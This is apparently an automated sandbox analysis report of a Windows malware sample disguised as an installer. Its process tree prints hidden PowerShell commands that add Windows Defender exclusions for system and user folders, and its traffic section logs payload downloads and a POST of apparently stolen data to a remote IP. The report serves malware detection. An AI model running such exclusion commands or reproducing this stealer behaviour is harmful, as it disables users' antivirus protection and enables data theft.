Windows Analysis Report
UBONg7lmVR.exe

Overview

General Information

Sample name:UBONg7lmVR.exe
renamed because original name is a hash value
Original sample name:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e.exe
Analysis ID:1499702
MD5:d2db9a159617250a517f9d074ab8f947
SHA1:cdc8efcd77ce4725200f29b9be43dac308a139a1
SHA256:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e
Tags:45-125-66-18, exe

Detection

Score:75
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UBONg7lmVR.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\UBONg7lmVR.exe" MD5: D2DB9A159617250A517F9D074AB8F947)
    • y5cm2yzz.hwt.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe" MD5: A499C507987982C951093E21DF0C0D96)
      • powershell.exe (PID: 8124 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5596 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7948 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7848 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1060 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3396 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2300 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rapnewsa.exe (PID: 8032 cmdline: C:\Reka\rapnewsa.exe MD5: 2D4E723C184D9403B078E53F2DE74A23)
        • WerFault.exe (PID: 3904 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 122888 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe", ParentImage: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe, ParentProcessId: 7992, ParentProcessName: y5cm2yzz.hwt.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 8124, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe", ParentImage: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe, ParentProcessId: 7992, ParentProcessName: y5cm2yzz.hwt.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 8124, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: C:\Reka\rapnewsa.exe, Avira: detection malicious, Label: HEUR/AGEN.1315917
Source: C:\Reka\rapnewsa.exe, ReversingLabs: Detection: 15%
Source: C:\Reka\rapnewsa.exe, Virustotal: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe, Virustotal: Detection: 8%
Source: UBONg7lmVR.exe, Virustotal: Detection: 13%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Reka\rapnewsa.exe, Joe Sandbox ML: detected
Source: C:\Reka\rapnewsa.exe, Code function: 23_2_002C1000 CryptUnprotectData
Source: C:\Reka\rapnewsa.exe, Code function: 23_2_002C1C40 CryptSignHashA, CryptUpdateProtectedState, WinHttpTimeFromSystemTime
Source: unknown, HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.216.51.233:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: UBONg7lmVR.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Reka\rapnewsa.exe, Code function: 23_2_002C8D40 FindFirstFileW, FindNextFileW, FindClose
Source: C:\Reka\rapnewsa.exe, File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Reka\rapnewsa.exe, File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Reka\rapnewsa.exe, File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Reka\rapnewsa.exe, File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Reka\rapnewsa.exe, File opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Reka\rapnewsa.exe, File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: global traffic, HTTP traffic detected: GET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1 | Host: bitbucket.org | Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNM7G6QD3X&Signature=axhudmqEvDM%2FSUhiHDRgUnl7%2FLM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBPQNDA%2Bh4G46KXw4LFfA9Io2JrUo7qexVGkmClXZ9XZAiEArKzvP5lXvxR0bzw4zii8AXSrZI4T8YzSZDU5HRHXvGAqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDBQ5D%2BO3Og5loUNzrCqEAlNSqyxdg90lqENE7Z1SnCpP6CAEKvQ2ZHflx5%2B9h97EGF%2BXeWo6gNL%2FKeau4g9mlbbEotcMw%2BrrPvVtwNlOZZrAvPyqKCz9MZpRG%2BpiC03DY8EyD%2BgUcSrXtsYVj1pY8epvtBzRmE%2FiDtiuZev9AlPjjVReOc21XzmG2S5RzBnktovq9Demuoz4DZKVKfYpiyX89uYSRKAsxMv%2FByN7IdIq6qCZVRx0QazWdIaUsZX5xlSjdEpSJPis3lWADR%2FBDkpX3wpSdaWD8PCizYGKT%2F2E2%2FTQ6T9aJkUzXz9IvClo4ct3sHAuc3qQYEfeMTJWLjMFtZKl8vhj%2BumqVAPYpTlp6oAVMNfjtrYGOp0BKT9YWtFy1GR5MK5hXid7YqSJRvsd%2FwKLvb%2BM6KMzyorpcCHfTbjl0lcEiPM9exK3azj%2BG9Z6KbEtKqhP2JBh1l8nNQ0B8rOE9SFVdCbfZZDWbRo0WGaMriccmr%2FYO0vC%2BM%2FhPCYL5SvzOfGdaWbmKgehwLg0mMfHk38JTQGQTLnnz22wGGUIntx8r0LvBLZsgM369fVm52jEYq%2F5wg%3D%3D&Expires=1724758239 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: Joe Sandbox View, IP Address: 185.166.143.49
Source: Joe Sandbox View, IP Address: 140.82.121.3
Source: Joe Sandbox View, IP Address: 185.199.111.133
Source: Joe Sandbox View, JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic, HTTP traffic detected: POST /api/receiver/recv HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48 | Content-Length: 3160 | Host: 45.125.66.18
Source: unknown, TCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1 | Host: raw.githubusercontent.com | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic, HTTP traffic detected: GET /workhasf/kelm/main/nepipirusas.json HTTP/1.1 | Host: raw.githubusercontent.com | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic, HTTP traffic detected: GET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1 | Host: github.com | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic, HTTP traffic detected: GET /workhasf/kelm/main/iconozave.exe HTTP/1.1 | Host: raw.githubusercontent.com | User-Agent: Go-http-client/1.1 | Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exe | Accept-Encoding: gzip
Source: global traffic, HTTP traffic detected: GET /get HTTP/1.1 | Host: httpbin.org | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic, DNS traffic detected: DNS query: bitbucket.org
Source: global traffic, DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic, DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic, DNS traffic detected: DNS query: github.com
Source: global traffic, DNS traffic detected: DNS query: httpbin.org
Source: unknown, HTTP traffic detected: POST /api/receiver/recv HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48 | Content-Length: 3160 | Host: 45.125.66.18
Source: C:\Reka\rapnewsa.exe Code function: 23_2_002C1470 NtQuerySystemInformation, OpenProcess, GetCurrentProcess, DuplicateHandle, GetFileType, CloseHandle, GetCurrentProcess, DuplicateHandle, CloseHandle, FindCloseChangeNotification
Source: C:\Reka\rapnewsa.exe Code function: 23_2_002C3D50 NtClose, NtClose
Source: C:\Reka\rapnewsa.exe Code function: 23_2_002C1610 NtQueryObject, NtQueryObject
Source: Joe Sandbox View Dropped File: C:\Reka\rapnewsa.exe 0A6BF0678BBD793E39A84DFB4C71D8B709D9E538288BF826C48B1BA899803BA4
Source: C:\Reka\rapnewsa.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 122888
Source: y5cm2yzz.hwt.exe.0.dr Static PE information: Number of sections : 15 > 10
Source: UBONg7lmVR.exe, 00000000.00000000.1675999694.0000000003904000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameInstaller Driver.exeB vs UBONg7lmVR.exe
Source: UBONg7lmVR.exe, 00000000.00000002.3547008907.0000000003D6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs UBONg7lmVR.exe
Source: UBONg7lmVR.exe Binary or memory string: OriginalFilenameInstaller Driver.exeB vs UBONg7lmVR.exe
Source: y5cm2yzz.hwt.exe.0.dr Static PE information: Section: /19 ZLIB complexity 0.9991581357758621
Source: y5cm2yzz.hwt.exe.0.dr Static PE information: Section: /32 ZLIB complexity 0.9933081454918032
Source: y5cm2yzz.hwt.exe.0.dr Static PE information: Section: /65 ZLIB complexity 0.9992535231210021
Source: y5cm2yzz.hwt.exe.0.dr Static PE information: Section: /78 ZLIB complexity 0.9908877648782687
Source: classification engine Classification label: mal75.evad.winEXE@27/32@5/6
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe File created: C:\Users\user\Desktop\new_example.txt
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Reka\rapnewsa.exe Mutant created: \Sessions\1\BaseNamedObjects\082e2202-17f7-4654-a651-ac9a3778e1d7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
Source: C:\Users\user\Desktop\UBONg7lmVR.exe File created: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
Source: UBONg7lmVR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: UBONg7lmVR.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Reka\rapnewsa.exe System information queried: HandleInformation
Source: C:\Users\user\Desktop\UBONg7lmVR.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: UBONg7lmVR.exe Virustotal: Detection: 13%
Source: unknown Process created: C:\Users\user\Desktop\UBONg7lmVR.exe "C:\Users\user\Desktop\UBONg7lmVR.exe"
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Process created: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe "C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exe
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
